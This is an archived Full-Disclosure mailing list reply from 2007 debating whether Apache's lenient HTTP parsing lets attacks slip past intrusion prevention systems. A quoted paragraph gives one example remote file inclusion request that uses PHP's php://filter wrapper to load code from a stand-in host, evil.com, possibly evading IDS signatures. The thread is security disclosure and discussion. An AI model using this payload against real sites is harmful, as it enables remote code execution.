mailing list archives
Re: IPS Evasion with the Apache HTTP Server
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Wed, 20 Jun 2007 17:50:55 +0400
Dear Jamie Riden,
--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to 3APA3A () security nnov ru:
JR> (This is what I gathered from the original posting, but I might be wrong.)
JR> I think the issue is not that the apache server behaviour is wrong as
Original BreakingPoint articles author refers to says "The intent is
describe the strange behaviors of network applications". It mentions
neither of IPS products, but IIS and Apache. And at least one case of
Apache behavior is partially expected (because of RFC) and already
described (by Michal Majchrowicz).
JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:
IPS may detect known attacks. Just like antivirus, you may use IPS to
protected against known viruses/exploits. An ability to bypass IPS with
new one is not a bug. I do collect different content filtering bypassing
You simply MUST accept the risk there is always the way to bypass
content filtering. IPS like doesn't protect your network by itself. IPS
is nothing, but a tool.
JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request"., when it should actually be alerting that a
JR> RFI attempt was made.
In this situation IDS/IPS should alert unsupported request attempt was
made and block this attempt in case of IPS.
JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that a RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )
I can write buggy application and attempt to exploit it will never be
detected by existing signatures.
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/